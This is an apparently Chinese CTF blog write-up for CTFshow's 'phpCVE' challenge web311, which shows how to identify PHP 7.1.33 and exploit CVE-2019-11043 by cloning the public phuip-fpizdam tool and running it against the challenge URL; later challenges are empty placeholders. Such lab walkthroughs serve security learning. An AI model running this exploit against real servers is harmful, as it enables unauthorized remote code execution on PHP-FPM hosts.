CTFshow——phpCVE

必备知识

①虚拟机或wsl;Kali Linux / Ubuntu / Debian都可以

②需要用到go环境

③设置国内代理(我用的是22世纪的科技)

web311

1.当我们打开后发现

查看源码

用wappalyzer发现是php7.1.33版本

然后去搜索php7.1.33cve或者随便组合

发现CVE-2019-11043(详细自己问AI或者去漏洞库看下)

①安装go环境

bash 复制代码
sudo apt update
sudo apt install golang git -y

验证是否装好

bash 复制代码
go version
git --version

②设置国内Go代理或者抓哆啦A梦让他拿出22世纪的高科技

这里我没时间设置代理了,直接破碎虚空虚天魔掌一把抓住哆啦A梦,从其口袋中拿到了高科技

③下载 exp 源码 phuip-fpizdam

bash 复制代码
git clone https://github.com/neex/phuip-fpizdam.git
#拉取下载后要进入文件夹
cd phuip-fpizdam

④拉取依赖

bash 复制代码
go get -v

⑤运行exp,靶场地址末尾必须带index.php

bash 复制代码
go run . "http://xxxxxx.challenge.ctf.show/index.php"

成功标志------下方红色框框

web312

持续更新中.....

web313

.......

web314

........

web315

相关推荐
传奇开心果编程2 天前
【Compose Multiplatform 跨端开发学与练】第8课 资源管理与主题
android·windows·学习·ios·kotlin·web·composer
传奇开心果编程2 天前
【Compose Multiplatform 跨端开发学与练】第9课 测试与调试
android·学习·macos·ios·kotlin·web·composer
hengdonghui2 天前
Writeup 4 红帽杯 2021 WebsiteManger
web·ctf·ssrf·sql布尔盲注
Seraphina364 天前
DVWA(SQL注入-low,medium,XSS反射-low)
前端·数据库·笔记·sql·网络安全·web·xss
hengdonghui4 天前
Writeup 4 津门杯 2021 Web hate_php
php·web·ctf·通配符
kali-Myon4 天前
ARTEX:AI 驱动的自动化漏洞挖掘平台
人工智能·安全·ai·自动化·web
hengdonghui4 天前
Writeup 4 红帽杯 2021 Web Find_It
web·ctf·备份文件泄露
熊猫钓鱼>_>6 天前
MetaAI深度研究研究报告
ai·meta·大模型·llm·agent·web·metaai
PYB310 天前
【Web·基础学习】基础布局
css·html·web